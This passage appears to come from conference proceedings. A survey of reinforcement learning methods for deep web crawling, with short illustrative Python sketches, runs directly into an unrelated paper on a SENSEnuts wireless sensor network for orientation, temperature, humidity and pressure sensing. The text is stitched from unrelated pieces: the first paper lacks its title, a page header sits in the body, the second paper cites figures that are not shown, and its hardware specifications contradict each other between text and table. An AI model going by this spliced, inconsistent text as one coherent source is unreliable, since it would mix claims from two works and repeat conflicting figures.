Punjab Engineering College (Deemed to be University), Chandigarh, India
R. Bhatia
e-mail: rbhatia@pec.edu.in

1 Introduction

The World Wide Web is a collection of documents that are connected by hyperlinks.
This collection is called the surface web, which is being crawled by various standard
search engines. The part of the web which is not accessed by hyperlinks but accessed
through search forms is called the deep web or hidden web. Bergman coined the
term deep web in 2001 and estimated the size of the deep web, which is 7500
terabytes compared to 19 terabytes of surface web [1]. 95% of deep web content is
freely available in the public domain. The importance of deep web content can’t be
ignored because it also contains high-quality information as compared to the surface
web. A deep web crawler finds the search forms, identifies their labels, fills them
with the relevant keywords, submits the form, and crawls the relevant region. Deep
web crawling (DWC) consists of five steps [2]: First is automated deep web entry
point discovery, second is form modeling, third is query selection, fourth is form
submission, and fifth is crawling paths learning. Various researchers have proposed
different methods to explore the deep web [3, 4]. In DWC, a user enters the query in the
search form, and then, all matched documents are returned. Whereas in ranked DWC,
a particular query is entered in the search form, and then only k matched documents
are returned. Designing a crawler that explores the deep web and the ranked deep web
is challenging. Reinforcement learning (RL) has gained tremendous popularity in
industry and academia due to its self-learning characteristics [5]. Various techniques
based on RL are used in the deep web to solve these challenges, as discussed in
Section 3. Different survey papers on DWC techniques were analyzed [6-10]. No
survey paper has been published wherein RL-based techniques in DWC are discussed
in detail; the existing surveys cover only one or two research papers related to RL in
the context of DWC. This motivates us to carry out a DWC
survey based on RL. To do this survey, the following search string has been prepared
that has value—‘reinforcement learning’ technique in ‘deep web crawling.’ This
search string was executed on the Google scholar website that returns 77 results
[11]. Irrelevant research papers were discarded based on manual inspection of title,
followed by an abstract and full text read in three steps. Figure 1 shows the survey
selection criteria for picking the research papers. Step 1 is based on the title of a
research paper, and the count is reduced to 70. In step 2, the exclusion is done on

Fig. 1 Research paper


selection procedure
#77

• Title based
exclusion #70
(Step 1)

• Abstract
based
exclusion #55
(Step 2)

• Full text
based
exclusion #31
(Step 3)
Reinforcement Learning in Deep Web Crawling: Survey 293

the basis of the abstract. Now, the research paper count is decreased to 55. In step
3, the selection is based on a full text read. The final count of research paper is 31.
This collection has 16 journal papers, 11 conference papers, and 4 book chapters.
Publishers of the above said collection are Springer, IEEE, ACM, Elsevier, Wiley,
etc.
The contributions of this research paper can be summarized as follows:
• To the best of our knowledge, it is the first survey paper that explores the research
papers of RL in the context of DWC.
• A comparative analysis of the various research papers has been done to explore
their functionality, dataset, metrics, and research gaps.
• A discussion on various open challenges of DWC and how RL can help to solve
these challenges.
The focus of the paper is to organize the various research papers related to RL
in the context of DWC. The rest of the paper is structured as follows: Section 2
presents the background details related to DWC and RL. Section 3 discusses RL-
based research papers pertaining to DWC. Section 4 shows the discussion on various
RL-based techniques and their comparative analysis. Finally, Section 5 summarizes
the conclusion and its future directions.

2 Background

2.1 Deep Web Crawling

This section describes the basic terms needed to understand the deep web. There are
various types of forms such as search form, query form, login form, subscription
form, polling form, and registration form in deep web. Such forms are categorized
into two parts. The first is the searchable forms, and the second is the non-searchable
forms. Search form and query form come under the category of searchable forms,
and the rest of the form types come under the non-searchable forms. Deep web
content can be accessed only through the searchable forms. Distinguishing the
searchable form from the other types of forms is a challenging task. The search form
consists of form labels, text boxes, drop-down lists, buttons, etc. Extraction of labels
and their semantics is a necessary step to model the forms. Finding the searchable form and
form modeling are the two steps that come under the pre-query category [6]. After
form modeling, query selection is required for filling the search form. A labeled value
set table was proposed by Raghavan et al. to fill the search form [12]. This table has
key-value pairs that generate the query. A query is filled in the search form to submit
the form and retrieve the content automatically. The crawler needs to traverse the
path to retrieve the desired information.
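As an illustration of the labeled value set idea, the minimal sketch below fills a search form with key-value pairs and submits it over HTTP; the URL, the form field name, and the keyword list are hypothetical placeholders for demonstration and are not taken from the cited works.

import requests

# Hypothetical labeled value set: the field name 'query' and the keywords are
# placeholders for illustration, not values taken from the cited works.
labeled_value_set = {"query": ["flood", "sensor network", "deep web"]}

def submit_queries(form_url, label, values):
    """Submit one form request per candidate value and return rough response sizes."""
    results = {}
    for value in values:
        resp = requests.post(form_url, data={label: value}, timeout=10)
        # The amount of returned content is a crude proxy for how productive a query is.
        results[value] = len(resp.text)
    return results

if __name__ == "__main__":
    # example.com is a placeholder search-form endpoint.
    print(submit_queries("https://example.com/search", "query",
                         labeled_value_set["query"]))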

2.2 Reinforcement Learning

RL is a type of machine learning that learns the optimal policy through the interaction
of the agent with environment [13]. The optimal policy is the guideline that helps to
select an appropriate action corresponding to a given state. The environment gives
a response based on the appropriate action. This response can either be a reward or
a penalty. It is always desirable to have a reward rather than a penalty. RL uses the
complete framework of the Markov decision process (MDP). An MDP is a four-tuple (S,
A, P, R), where 'S' is the set of states, 'A' is the set of actions, 'P' is the probability
of reaching the next state given an action, and 'R' is the immediate reward produced
by the environment on moving from the current state to the next state. RL maps all
entities such as agent, environment, actions, states, reward function, objective function,
and transition function onto the DWC problem. Q-learning and learning
automata are the types of RL algorithms used in the deep web [3, 14]. Designing the
reward function is a very challenging task. A minor change in the reward function
has a great impact on the policy. There are two types of methods to design the
reward function. First, the manual numeric method is based on domain knowledge.
Second is direct learning from the knowledge of experts using some techniques
like the preference-based RL technique. The preference-based RL technique can be
combined with the DWC domain to design the reward function [15]. Reward function
w.r.t DWC generally considers instant rewards rather than long-term rewards. This
challenge is known as the myopia problem. There are various models to overcome
this challenge, like Q-value-based approximation [3], infinite-horizon discounted
model [14], etc.
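As a hedged illustration of how tabular Q-learning could frame query selection (states as crawl progress, actions as candidate queries, reward as newly retrieved documents), a toy sketch is given below; the state/action encoding and the reward numbers are assumptions made for demonstration, not the exact formulation of the cited papers.

import random
from collections import defaultdict

ACTIONS = ["flood", "sensor", "crawler", "network"]       # candidate query keywords (toy)
NEW_DOCS = {"flood": 12, "sensor": 30, "crawler": 5, "network": 18}  # toy reward signal

alpha, gamma, epsilon = 0.5, 0.9, 0.2                      # learning rate, discount, exploration
Q = defaultdict(float)                                     # Q[(state, action)] table

def step(state, action):
    """Toy environment: reward = new documents retrieved; the state counts queries issued."""
    reward = NEW_DOCS[action] * (0.5 ** state)             # diminishing returns as the crawl proceeds
    return state + 1, reward

for episode in range(200):
    state = 0
    for _ in range(4):                                     # submit four queries per episode
        if random.random() < epsilon:
            action = random.choice(ACTIONS)
        else:
            action = max(ACTIONS, key=lambda a: Q[(state, a)])
        next_state, reward = step(state, action)
        best_next = max(Q[(next_state, a)] for a in ACTIONS)
        # Standard Q-learning update towards the bootstrapped target.
        Q[(state, action)] += alpha * (reward + gamma * best_next - Q[(state, action)])
        state = next_state

print({a: round(Q[(0, a)], 2) for a in ACTIONS})           # learned values for the first query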

3 Review of Literature

Bergman first introduced the term deep web, in which dynamic content is
generated by filling a query in a search form [1]. Various surveys related to the deep
web were studied to find the number of RL-technique-based papers and to identify
new research dimensions that can be investigated for this survey.
Hernandez et al. proposed a detailed survey of DWC techniques till 2017 [2].
However, this survey covered only two research papers based on the RL technique.
Moraes et al. recommended a systematic literature review based on search form
discovery techniques till mid of 2011 [6]. Only one RL paper based on form crawler
was covered.
Saini et al. have come up with a crawling survey paper in the field of information
retrieval till 2015 [8]. Only one research paper on RL was presented from the focused
crawling domain and missed the RL technique implementation in the deep web
domain.

Kumar et al. presented a systematic literature review of web crawlers comprising
248 papers published till the year 2014 [9]. It contained only two research papers
related to the RL technique.
Li et al. presented a short review paper on deep web data extraction techniques
till 2019 [10]. Only two research papers related to RL were discussed.
Shah et al. briefed a short survey consisting of 13 papers on focused crawling
and DWC [16]. Only one paper based on RL was presented that finds the searchable
forms.
It is concluded that the literature doesn’t have a detailed survey on RL techniques
in the deep web. An opportunity is there to explore the RL techniques in the domain
of DWC, which are discussed below.
Akilandeswari et al. designed a deep web crawler that locates the searchable form
and retrieves its content efficiently [17]. It used the RL technique with different
agents. Crawler explored the effective policy, which helps to find the searchable
forms from the web pages.
Jiang et al. proposed a framework for the deep web surfacing problem based on
RL approach [3]. An algorithm, namely Q-value approximation, handled the myopia
problem related to query in the deep web.
Castro et al. advised a machine learning-based algorithm to identify and clas-
sify the searchable forms from non-searchable forms [18]. This classification is the
essential step to access the deep web and remove the irrelevant forms.
Chakrabarti et al. coined the focused crawler, which has two classifiers, i.e.,
apprentice-based and critic-based [19]. A graph represented this crawling process,
and a webpage represents each node. A score of each node is modified by backprop-
agation in the crawl graph. The advantage of this approach is independent of crawler
implementation.
Sharma et al. devised a crawling technique based on query protocol server [20].
This technique has various modules such as multithreading modules, web page
analyzer, form submitter, and crawl frontier.
Singh et al. proposed an intelligent agent approach to crawl the deep web [21].
It has two agents and one coordinator. Each agent has three main components, i.e.,
feature learner, classifier, and crawler. RL helped to learn the new features. Their
objective was to collect maximum rewards. Various ensembles techniques can help
improve the classifier’s accuracy [22].
Zhang et al. recommended a formal concept analysis and lattice-based algorithm
for selecting the queries to retrieve the deep web content [23].
Pavai et al. recommended the probabilistic technique to improve the freshness of
deep and surface web [24]. Semantically similar queries were identified using the
WordNet dictionary.
Pratiba et al. proposed the distributed web crawler, which explored the deep web
[25]. Crawler comprised of Neo4J, HBase, and RL technique. Neo4J is a graph-based
database management system that helped to maintain the relationship between web
pages and their hierarchy. HBase is a Hadoop-based open project which stores web
documents. RL helped to crawl the deep web efficiently.

Kumar et al. proposed automata entitled 'Hidden Web Distributed Learning
Automata' for detecting new hidden web pages [14].
Ahmed et al. proposed a text
classification technique based on the RL and term frequency [26]. Word2vec tech-
nique was used to collect the neighboring keywords text and convert it into vectors.
These vectors helped to increase the classification accuracy. This technique can be
combined with optimal feature extraction [27].
Murali et al. presented a focused web crawler that retrieved online e-commerce
websites [28]. Mishra et al. proposed the reinforcement-based focused approach that
addressed the myopia problem [4].
Tahseen et al. proposed an architecture for crawling the deep web [29]. A deep web
crawler’s architecture contained a page downloader, URL extractor, form analyzer,
response analyzer, and frontier. Dataset had 1026 URLs. Precision and recall metrics
were used for evaluation.
Tanvir et al. proposed a technique based on word2vec and RL [30]. This technique
was used to find the semantic relation between words and documents.

4 Discussion

Thirty-one research papers out of the seventy-seven research papers have been studied
for this survey. No survey paper exists which covers the RL-based technique for
DWC. This is the main motivation behind this survey. This paper reviews the RL-
based techniques that are successfully applied to DWC. Table 1 shows the various
DWC techniques based on RL. Further, its comparative analysis, strength, and future
scope are also mentioned. RL-based techniques such as Q-value-based learning,
learning automata have already been explored in the literature. Various ensemble
approaches, i.e., term frequency–inverse document frequency (TF-IDF), RL with
word2vec, Cascading Style Sheets (CSS) visual properties with RL, and agent coor-
dinator architecture, were also used to traverse the deep web. Kumar et al. proposed
an algorithm based on learning automata to find the deep web pages [14]. This work
with query optimization can be used to crawl the ranked deep web also. Kaelbling
et al. explained the strength and weakness of various models for reward function such
as average reward model, finite horizon, infinite horizon, infinite-horizon discounted
model, normalized discounted cumulative gain, Q-value based approximation [5].
The selection of models also depends on the type of RL techniques. There is much
scope of RL-based techniques for DWC, as discussed in Section 5.

Table 1 Comparative analysis and research gaps

S. No | Strength | Dataset | Metrics | Future scope
1 | Jiang et al. proposed a Q-value approximation algorithm to deal with the myopia problem [3] | Abebooks, Yahoo movie, etc. | Coverage | Typed text boxes can be implemented with this technique
2 | Mishra et al. solved the myopia problem using CSS visual properties and RL technique [4] | DARPA MEMEX dataset on human trafficking | Relevancy score | Ensemble and meta-learning approaches can be applied to improve further
3 | Kumar et al. used an algorithm using learning automata to find the deep web pages [14] | Open Directory Project | Precision, recall, and coverage plot | Query optimization techniques can be used for improving precision
4 | Akilandeswari et al. suggested a deep web crawler to find searchable forms from non-searchable forms using the RL technique [17] | 3450 web pages | Number of searchable forms | This crawler can be tested on a larger dataset for crawler generalization
5 | Pavai et al. proposed a weighted semantic method to reduce the number of queries [24] | Ten million tourist documents | Crawl-hit rate and freshness | The crawl-hit rate needs to be improved
6 | Ahmed et al. endorsed a text classification technique using TF-IDF, word2vec, and RL [26] | Sixteen hundred web pages | Precision, recall, accuracy, and F-score | Accuracy can be improved by optimal text features
7 | Tanvir et al. recommended a technique based on word2vec and RL to find the semantic relation between the query and its document [30] | NASA and Korean University websites | Semantic relation (δ) | This technique can be applied with large datasets for generalization
8 | Patil et al. presented the crawler architecture to explore the search form using Q-learning with ε greedy approach [31] | IndiaBix, Telenor | Harvest rate, number of searchable forms | The greedy approach can be improved

4.1 Open Questions in DWC

Searchable form discovery is an open challenge in DWC. It can be successfully done
with the help of RL-based techniques. These techniques use self-learning character-
istics to identify the search forms. A generic framework can be made to map all its
elements corresponding to the deep web. Form modeling is a tedious task consisting
of label identification and its semantics. It can be implemented with RL-based tech-
niques. Transfer learning can be combined with RL to generate relevant keywords.
These keywords are filled in the search forms, more results are retrieved, and the
environment generates more reward. No work has been done on the sampling strate-
gies for information extraction over the ranked deep web. Transfer learning with
RL can help us to find the high-quality document sample for ranked deep web.
This high-quality document sample leads to minimum query submissions
and maximum coverage. Thus, the environment gives more rewards and leads to
the optimal policy. Query selection of deep web is a challenging task. Finding the
optimal query set is an unsolved problem.

5 Conclusion and Future Scope

This paper surveys various techniques wherein RL has been successfully applied to
the deep web. Different survey papers have been studied to explore the research gaps
existing in the literature. RL-based techniques in the domain of DWC are still in their
infancy stage. Thus, RL-based techniques have immense potential for research in the
field of DWC. Comparative analysis of various techniques with their future scope has
been revealed. Some of the RL-based techniques have not been applied to DWC yet.
Researchers can explore such techniques, i.e., Deep Deterministic Policy Gradient,
Reinforce, Monte Carlo Policy Gradient, Reinforce with baseline, and Deep RL
techniques such as Deep Q-Network, Actor-critic based learning. These techniques
can help to solve the challenges of DWC. Designing the reward function is a crucial
part of RL. Various techniques, i.e., imitation learning, replay buffer, preference-
based RL, inverse RL, etc., can be used to define the reward function. The imitation
learning or inverse RL technique may help to design the reward function when a
reward function definition is not available.

References

1. Bergman, M. K. (2001). White paper: The deep web: Surfacing hidden value. Journal of
Electronic Publishing, 7(1).
2. Hernández, I., Rivero, C. R., & Ruiz, D. (2019). Deep web crawling: A survey. World Wide
Web, 22(4), 1577–1610.
3. Zheng, Q., Wu, Z., Cheng, X., Jiang, L., & Liu, J. (2013). Learning to crawl deep web.
Information Systems, 38(6), 801–819.
4. Mishra, A., Mattmann, C. A., Ramirez, P. M., & Burke, W. M. (2018). ROACH : Online
apprentice critic focused crawling via CSS cues and reinforcement. In Proceedings of ACM
Conference on Knowledge Discovery and Data Mining (KDDD 2018), August (pp. 1–9).
5. Kaelbling, L. P., Littman, M. L., & Moore, A. W. (1996). Reinforcement learning: A survey.
Journal of Artificial Intelligence Research, 4, 237–285.
6. Moraes, M. C., Heuser, C. A., Moreira, V. P., & Barbosa, D. (2013). Prequery discovery
of domain-specific query forms: A survey. IEEE Transactions on Knowledge and Data
Engineering, 25(8), 1830–1848.
7. Kantorski, G. Z., Moreira, V. P., & Heuser, C. A. (2015). Automatic filling of hidden web
forms. ACM SIGMOD Record, 44(1), 24–35.
8. Saini, C., & Arora, V. (2016). Information retrieval in web crawling: A survey. In 2016 Inter-
national Conference on Advances in Computing, Communications and Informatics (ICACCI)
(pp. 2635–2643).
9. Kumar, M., Bhatia, R., & Rattan, D. (2017). A survey of web crawlers for information retrieval.
WIREs Data Mining Knowledge Discovery, 7(6), e1218.
10. Li, S., Chen, C., Luo, K., & Song, B. (2019). Review of deep web data extraction. In 2019
IEEE Symposium Series on Computational Intelligence (SSCI) (pp. 1068–1070).
11. Google Scholar. 2020. [Online]. Available http://scholar.google.com/. Accessed 30 December
2020.
12. Raghavan, S., & Garcia-Molina, H. (2001). Crawling the hidden web. In 27th VLDB
Conference—Roma, Italy (pp. 1–10).
13. Sutton, R. S., & Barto, A. G. (1998). Reinforcement learning: An introduction.
14. Kumar, M., & Bhatia, R. (2018). Hidden webpages detection using distributed learning
automata. Journal of Web Engineering, 17(3–4), 270–283.
15. Wirth, C., Akrour, R., Neumann, G., & Fürnkranz, J. (2017). A survey of preference-based
reinforcement learning methods. Journal of Machine Learning Research, 2, 30–34.
16. Shah, S., Patel, S., & Nair, P. S. (2014). Focused and deep web crawling—A review.
International Journal of Computer Science and Information Technologies, 5(6), 7488–7492.
17. Akilandeswari, J., & Gopalan, N. P. (2007). A novel design of hidden web crawler using
reinforcement learning based agents. In Advanced parallel processing technologies (Vol. 4847,
pp. 433–440). Springer.
18. Marin-Castro, H. M., Sosa-Sosa, V. J., Martinez-Trinidad, J. F., & Lopez-Arevalo, I. (2013).
Automatic discovery of web query Interfaces using machine learning techniques. Journal of
Intelligent Information System, 40(1), 85–108.
19. Chakrabarti, S., Punera, K., & Subramanyam, M. (2002). Accelerated focused crawling through
online relevance feedback. In Proceedings of 11th International Conference on World Wide
Web, WWW’02 (pp. 148–159).
20. Sharma, D. K., & Sharma, A. K. (2011). A QIIIEP based domain specific hidden web crawler. In
Proceedings of the International Conference & Workshop on Emerging Trends in Technology—
ICWET ’11 (pp. 224–227).
21. Singh, L., & Sharma, D. K. (2013). An approach for accessing data from hidden web using
intelligent agent technology. In 2013 3rd IEEE International Advance Computing Conference
(IACC) (pp. 800–805).
22. Alzubi, O. A., Alzubi, J. A., Ramachandran, M., & Al-shami, S. (2020). An optimal
pruning algorithm of classifier ensembles: Dynamic programming approach. Neural Computer
Applications, 6.

23. Zhang, Z., Du, J., & Wang, L. (2013). Formal concept analysis approach for data extraction
from a limited deep web database. Journal of Intelligent Information System, 41(2), 211–234.
24. Pavai, G., & Geetha, T. V. (2017). Improving the freshness of the search engines by a
probabilistic approach based incremental crawler. Information Systems Frontiers, 19(5),
1013–1028.
25. Pratiba, D., Shobha, G., Lalithkumar, H., & Samrudh, J. (2017). Distributed web crawlers using
hadoop. International Journal of Applied Engineering Research, 12(24), 15187–15195.
26. Ahmed Md. Tanvir, M. C. (2019). Design and implementation of web crawler utilizing
unstructured data. Journal of Korea Multimedia Society, 22(3), 374–385.
27. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & De Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computer Application, 6.
28. Murali, R. (2018). An intelligent web spider for online e-commerce data extraction. In 2018
Second International Conference on Green Computing and Internet of Things (ICGCIoT)
(pp. 332–339).
29. Tahseen, I., & Salim, D. (2018). A proposal of deep web crawling system by using breath-first
approach. Iraqi Journal of Information and Communications Technology, 48–61.
30. Tanvir, A. M., Kim, Y., & Chung, M. (2019). Design and implementation of an efficient web
crawling using neural network. In Advances in computer science and ubiquitous computing
(pp. 116–122). Springer.
31. Patil, Y., & Patil, S. (2016). Implementation of enhanced web crawler for deep-web interfaces.
International Research Journal of Engineering and Technology, 2088–2092.
Wireless Sensor Network for Various
Hardware Parameters for Orientational
and Smart Sensing Using IoT

Mohammad Danish Gazi, Manisha Rajoriya, Pallavi Gupta,


and Ashish Gupta

Abstract SENSEnuts is an advanced platform that provides user-friendly features
such as easy-to-use APIs, user-modifiable source code, and a GUI, and it helps in
real-time analysis of sensor data. Another advantage of SENSEnuts is the connection
of wireless devices at a very low data rate and low-power consumption. The data
sensed by the sensor nodes is transferred to the Internet through the SENSEnuts
Wi-Fi module and is usually stored in the cloud, from where the sensed raw data
can easily be analyzed and monitored. Using the SENSEnuts hardware packages
employed in this paper, namely the GAP, HTP, and TL sensor packages, we can
overcome the conventional difficulties of hardware implementation, design, and
software rectification: the accelerometer-based orientational sensing analyzes
different planes and motions, and humidity, pressure, and temperature sensing is
obtained without additional hardware implementation, which can be used in smart
agriculture and smart home systems. The work carried out proves to be cost-effective,
with high accuracy and precision compared to conventional hardware implementations,
with live updating from the sensor nodes to the senslive GUI for accurate and
precise detection and usage.

Keywords Internet of Things (IoT) · Wireless sensor network (WSN) · SENSEnuts · Senselive · GUI · GAP sensor · HTP · TL sensor

M. D. Gazi (B) · M. Rajoriya · P. Gupta · A. Gupta


Department of EC Engineering SET, Sharda University, Greater Noida, India
M. Rajoriya
e-mail: manisha.rajoriya@sharda.ac.in
P. Gupta
e-mail: pallavigupta2@sharda.ac.in
A. Gupta
e-mail: Ashishgupta1@sharda.ac.in


1 Introduction

Internet of Things (IoT), the general term used in the new era of communication,
refers to cases where network connectivity and computational capability are extended
toward sensor nodes and actuators, allowing data-driven exchange of information
without any external intervention. In IoT, any node connected to the network is
termed smart, as it consists of inbuilt intelligence that helps it to perform different
kinds of tasks by itself. A wireless sensor network (WSN) has an added advantage
over other networks due to its ability to sense remote locations where direct
monitoring of data is not possible. IoT has attracted numerous attentions in a wide
range of applications. The major concerns in today's world are time and accuracy,
which means many applications throughout the world need continuous attention;
e.g., the temperature of a boiler room needs to be continuously monitored, and an
alarm should be raised if the temperature goes out of the margin line. For such
purposes, SENSEnuts is one of the best platforms, as it enables us to continuously
gather real-time data through sensor nodes in an accurate manner. However, in order
to store the data and to do post analysis of data coming from sensor nodes for further
applications, the data needs to be stored in a cloud.
This work is based on wireless communication of sensor networks and the combination
of real-time data with IoT. In [1], the authors proposed triaxial accelerometer-based
human motion detection using perceptron algorithmic theory and neural coding
models; this model requires extensive neural algorithm coding for three-plane
position sensing, which can be done hassle free using the SENSEnuts GAP sensor
package and its respective GUIs in the proposed work. Khan et al. proposed
triaxial accelerometer-based activity sensing using augmented features and a
hierarchical recognizer [2]. In [3], the authors proposed a web-based sewage
monitoring system using a set of hardware containing the TL sensor. Estrada-Lopez
et al. proposed a smart soil parameters estimation system using an autonomous
wireless sensor network with a dynamic power strategy [4]. In this work, the soil
parameters that are suitable for the growth of crops are chosen by using a deployed
wireless sensor network that consists of nodes and sensors. Work in [5] proposed
an energy-aware corona-level-based routing approach for IEEE 802.15.4-based
wireless sensor networks. Agarwal et al. explained the design and implementation of
medium access control-based routing on a real wireless sensor network testbed [6].
In the above-mentioned works, the authors have used sensing technologies like
RFID, PIC, GSM, Raspberry Pi, and ZigBee, and augmented-reality-based coding
for activity sensing using conventional accelerometers only [6-8]. With those types
of heavily coded devices, they were able to control and analyze the temperature,
humidity, and pressure required for optimal agricultural usage. These papers provide
an idea for using WSN with the SENSEnuts platform for activity sensing, temperature
sensing, and humidity and pressure sensing for agricultural usage and other user
applications [8-10]. These papers also give us an idea about the deployment of
user-specific IoT network systems, for which the platform known as SENSEnuts is best suitable

for its node to node communication, its robustness, and easily available GUI [10-14].
This platform is also very economical and can be used for research purposes [14-17].

2 WSN System Architecture

In this section, the basic WSN system architecture using SENSEnuts platform used
for this work is described. The easily usable graphical user interfaces in SENSEnuts
makes it in demand for industrial and research purposes. The WSN system architecture
can be seen in Fig. 1, which gives an accurate top-to-bottom hierarchy of how the
different sensor nodes are connected to each other, giving a highly precise and
user-friendly system with auto-updating GUIs. WSN, being a modular type of design,
gives seamlessly integrated performance with a fast node-to-node communication
system. Being modular also makes it easy to install and faster to deploy. The WSN
hardware is summarized in Table 1.

2.1 The Sensor Node

The proposed sensor module design structure in this work is shown in Fig. 1. The
lowermost part consists of a 5 V battery. Above the battery is a radio module, which
contains a PCB antenna and a microcontroller. Above the radio module, the sensor
nodes are attached. There also exists a USB gateway module, also known as the
extender module, that is usually attached on the top. Specifications for each module
used (shown in Fig. 2) are given below.
Extender: It is used to extend the microcontroller to other sensor devices. It also
debugs hardware and access SPI, UART, ADC, I2C protocols in it.
Radio module: The microcontroller used here is the JN5168. It is used for wireless
transmission of real-time data. It follows the IEEE 802.15.4 standard with a low-power
32-bit RISC controller running at a clock of 32 MHz, with 32 kb of RAM, 256 kb of
flash memory, and 4 kb of EEPROM. The security in this type of module is AES based,
with a receiving current of 17 mA, a transmitting current of 15 mA, and a controllable
transmission power ranging from −31 to +2.5 dBm.
Light and temperature sensor: The temperature sensing range of this sensor is
from −24 to 80 °C with a resolution of 12 bits. The light sensing capability is
measured in lux, from 3 to 63 k lux, with a resolution of 16 bits, excellent IR/UV
rejection, and a 1.5 uA shutdown current.
Temperature, pressure, and humidity sensor: The sensors used here measure the
relative humidity and pressure with resolutions of 14 and 24 bits (0.04% RH),
respectively.

Fig. 1 Sensor node

Soil moisture sensor: This type of sensor measures the moisture in soil by
measuring the change in equivalent resistance between the two nodes of sensor
probes.
GAP sensor: It is used for overall motion and positioning detection purposes. It
consists of a GPS, a transceiver, an accelerometer, a PIR sensor, and an antenna,
with 14-bit/8-bit digital output, ±2g, 4g, 8g dynamically selectable full scale, a
built-in PIR, and extremely low current consumption.

Table 1 Characterization of implemented hardware
Hardware parameters | Specifications
Package used | SENSEnuts, PC, USB
Software used | SENSEnuts toolchain, IDE
Communication methods | 802.15.4 IEEE, USB, Wi-Fi gateway
Sensors used | SENSEnuts GAP, TL, HTP
Radio modules | JN5168, 32 bit with RISC architecture
Cloud services | Any open-source cloud service
Memory | 4 kb EPROM, 32 kb RAM, 256 kb FLASH
GUI | SENSEnuts GUI visualizations
TL sensor | Temp range: −24 to 80 °C, light range: 3 to 63 k lux
HTP sensor | Humidity with 16-bit resolution and pressure with 24-bit resolution
GAP sensor | 8-bit to 16-bit output and ±2g, 4g, 8g resolution
Access medium | CA, CSMA
Database used | Open source, SQL

Fig. 2 USB gateway module

Wi-Fi gateway system: It uses an SPI interface. The band coverage here is 2.4 GHz
with the 802.11 b/g/n Wi-Fi standard. It consists of a serial flash system with a
Broadcom BCM43362 single band that includes Wi-Fi security modes like:

Open, WEP, WPA, WPA2-PSK with 1 MB flash memory and 128 kb SRAM with
Wi-Fi power save of 0.77 mA.

3 Implementation and Methodology

3.1 Overview

Figure 9 shows how the sensor data is sent to the senselive network and identifies
all the connected devices used in the network, such as the sensor nodes, the PAN
coordinator, and the Wi-Fi module. Different MAC IDs exist for the different sensor
nodes. The setup also consists of a gateway module for connectivity of the overall
IoT setup. The SENSEnuts platform works on the IEEE 802.15.4 standard, which
offers user-efficient parameters such as low bandwidth, low battery usage, and a
maximum range of communication. Further, the data coming from the sensor nodes
is carried through the network to the senselive user interface, where it is stored and
analyzed for future applications.

Fig. 3 TL sensor module



3.2 Sensing and Processing the Information

The fundamental unit used here consists of the sensor nodes or modules that are
part of the SENSEnuts platform, which includes the GAP sensor, TL sensor, and HTP
sensor. An external battery-powered radio module is installed below each of the two
sensor nodes, with a coordinator set up in the middle of the two sensor nodes. A PAN
coordinator is also installed, with a radio module and a Wi-Fi module attached to it
for transmission and reception purposes. The PAN coordinator gets associated with
the coordinator, all the information is carried forward to the PAN coordinator, and
the information is then forwarded to the Wi-Fi module for its wireless transmission.
The functionality of the PAN coordinator and the coordinator is different, but the
same hardware setup is used for both; the functional difference lies in whether the
node is programmed as a PAN coordinator or as a coordinator. To program these
modules, the drivers are installed after the gateway module of the SENSEnuts
platform is plugged in. After the code is built and compiled into a hex file, a bin file
is generated that is flashed into the device. After that, the GUI of SENSEnuts is
opened, whose work is to display the raw data coming from the sensor nodes; upon
programming the particular sensor node, both the PAN coordinator and the
coordinator are connected. Once both are associated with each other, the coordinator
starts sending the raw data wirelessly to the PAN coordinator, and we can easily see
the live readings of the quantity that the particular sensor is designed to measure.
The MAC addresses of the attached sensor nodes are also checked at the beginning
of the setup connection.
The specifications of the hardware and software used are summarized in Table 1.
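For context, a generic host-side sketch of the kind of gateway forwarding described above is given below: it reads frames from a USB gateway's serial port and posts them to a cloud endpoint. The serial port name, baud rate, frame format, and URL are assumptions for illustration; this is not the SENSEnuts toolchain or senselive API.

import json
import serial      # pyserial
import requests

PORT, BAUD = "/dev/ttyUSB0", 115200              # assumed gateway serial settings
CLOUD_URL = "https://example.com/api/readings"   # placeholder cloud endpoint

def forward_readings():
    with serial.Serial(PORT, BAUD, timeout=5) as gw:
        while True:
            line = gw.readline().decode("utf-8", errors="ignore").strip()
            parts = line.split(",")
            # Assumed frame format: "<mac>,<sensor>,<value>", e.g. "0015ED...,HTP,48.2"
            if len(parts) != 3:
                continue
            payload = {"mac": parts[0], "sensor": parts[1], "value": float(parts[2])}
            requests.post(CLOUD_URL, data=json.dumps(payload),
                          headers={"Content-Type": "application/json"}, timeout=10)

if __name__ == "__main__":
    forward_readings()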

4 Results and Discussion

4.1 Output on Senselive

The data coming from the real-time sensor nodes can be verified in senselive.
This data gets updated on a real-time basis on the senselive platform. Different sets
are made according to their parameters and usability, such as the GAP sensor, HTP
sensor, and TL sensor, and the data coming from these sensors gets continuously
updated on the senselive platform. The GAP sensor output is given in Figs. 10, 11,
12, 13, and 14, while that of the HTP and TL sensors can similarly be obtained using
the senslive GUI interface. The changes in position, temperature, light, humidity,
and pressure can be seen in the senselive platform, as shown in Figs. 10, 11, 12, 13,
and 14.
In Figs. 10, 11, 12, 13, and 14, this data is shown on the senselive GUI of the GAP
sensor node. The GAP sensor node gives us live readings coming from the actual
connected node and can be used to sense real-time readings that could be helpful in
detecting object acceleration in the x, y, and z planes. The movement of this GAP
sensor gives us the change in the real-time readings in the three planes of movement
of the object, which also helps us in detecting the plane of motion of the object.

Fig. 4 GAP sensor module

Fig. 5 HTP sensor module

Fig. 6 Total sensor stack



Fig. 7 Extender module

Fig. 8 Radio module

The SENSEnuts GAP sensor is not only beneficial over conventional triaxial
accelerometers for detecting the motion of a moving object in the three axis planes,
which otherwise requires a lot of augmented and neural-network-based design and
coding for the live updating that is shown in this proposed work using the GAP
sensor and the senselive GUI, but it also proves to be cost efficient and less power
consuming, with real-time updating of readings on the open-source cloud. This GAP
sensor from the SENSEnuts package could be used for real-time updating and
monitoring services in defense technology.

Fig. 9 Sensing and processing the information

Similarly, the data can be given on the senselive GUI for the
TL sensor, which gives us real-time updating of the temperature and light using
this senselive package. In this way, the TL sensor data can help the user with regular
climatic updates for any agricultural usage and purpose. The data coming from
the TL sensor node also gets updated on the real-time GUI interface of SENSEnuts,
making it a user-friendly, low-power-consuming application with real-time updating.
Similarly, we can notice the change in the real-time readings coming from the HTP
sensor node, which are also updated in real time on the senselive GUI for their
analysis and usage (Figs. 10, 11, 12, 13 and 14).
